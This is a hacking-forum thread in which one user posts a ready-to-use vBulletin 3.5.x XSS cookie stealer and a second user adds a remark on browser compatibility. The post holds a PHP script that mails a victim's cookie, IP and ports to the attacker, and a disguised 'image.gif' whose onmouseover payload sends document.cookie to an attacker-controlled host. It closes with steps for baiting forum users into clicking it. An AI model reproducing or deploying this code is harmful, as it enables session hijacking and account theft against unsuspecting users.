Jump to content
Ras

Vbulletin 3.5.x Cookie Stealer And Mailer Exploit {script}

By Ras, in Exploituri

Recommended Posts

Ras Newbie

Ras

Posted
Posted 

=> Xss Vbulletin 3.5.x ( test: 3.5.4 )
_________________________________________________________________________


( 1 )

--------------------------------------------------------------------

Name file:  exploit.php

--------------------------------------------------------------------


<?php
$ip_adresse = $_SERVER['REMOTE_ADDR'];
if(!empty($ip_adresse))
{
echo 'il tuo ip ?: ',$ip_adresse;
}
else
{
echo 'Impossible d\'afficher l\'IP';
}
?>

[url="log.php"][/url]<?
$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>

<?php
$cookie = $_GET['c'];
?>

<?php
$myemail = "YOUR ADDRESS E-MAIL";
$today = date("l, F j, Y, g:i a");
$subject = "Xss Vbulletin";
$message = "Xss: Hacking
Ip: $ip_adresse
Cookie: $cookie
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today  \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>



--------------------------------------------------------------------

<?php
$myemail = "YOUR ADDRESS E-MAIL";

--------------------------------------------------------------------


( 2 )

--------------------------------------------------------------------

Name file:  image.gif

--------------------------------------------------------------------


<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' >


--------------------------------------------------------------------

location="http://YOUR ADDRESS WEB.com

--------------------------------------------------------------------


( 3 )

--------------------------------------------------------------------

Like Using
--------------------------------------------------------------------

1°  new thread
2°  [url="http://YOUR ADDRESS WEB.com/IMAGE.GIF"]BEAUTIFUL GIRL[/url] '
3°  Submit
4°  It waits for

--------------------------------------------------------------------

Content:

1.image.gif

2.exploit.php

How to:

1.Edit exploit.php, find "mail@mail.com" and replace with ur mail.

2.Then upload in a server if u have a site, note the link.(any free site with php is enough)

3.Open the image.gif in a text editor and replace the "http://something.com/exploit.php" with urs.

4.Put the image.gif in a vBulletin form and wen the user click that, gif redirects to exploit.php, this collects the cookie and u will get a mail.

SlicK Newbie

SlicK

Posted
Posted

Functioneaza numai pe IE(inclusiv 7) deoarece nu verifica extensia unui fisier atunci cand este incarcat in browser considerandu-l HTML.

Smecheria cu imaginea merge cam oriunde poti posta un link :D

Eu am incercat cu PNG nu cu GIF dar presupun ca e acelasi lucru ...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...